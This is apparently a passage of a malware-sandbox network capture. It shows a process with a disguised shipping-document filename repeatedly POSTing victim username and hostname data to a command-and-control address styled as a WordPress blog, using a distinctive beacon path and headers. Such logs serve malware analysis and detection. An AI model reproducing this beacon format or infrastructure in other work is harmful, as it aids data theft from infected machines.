Apr 25, 2024 09:43:16.129221916 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:16.129400969 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:16.129493952 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:16.129673004 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:16.129729033 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:16.129795074 CEST	670	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49811	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:16.392996073 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:16.526114941 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:17.369342089 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:16 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:17.369599104 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:43:17.369709969 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:17.377700090 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:17.378060102 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:17.378256083 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:17.378369093 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:17.378478050 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:17.378541946 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:17.378712893 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49812	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:17.642261028 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:17.770742893 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:18.636362076 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:17 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:18.636396885 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:43:18.636408091 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:18.657228947 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:18.659353971 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:18.659478903 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:18.659600019 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:18.659692049 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:18.659744024 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:18.659809113 CEST	761	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49813	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:18.909478903 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:19.036571980 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:19.899868965 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:18 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:19.900007010 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:43:19.900019884 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:19.908771992 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:19.909132004 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:19.909281969 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:19.909337044 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:19.909456968 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:19.909539938 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:19.909552097 CEST	670	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49814	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:20.366841078 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:20.493375063 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:21.323591948 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:20 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:21.323753119 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:43:21.323901892 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:21.332727909 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:21.332771063 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:21.332911968 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:21.333028078 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:21.333203077 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:21.333631992 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:21.333915949 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49815	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:21.643851042 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
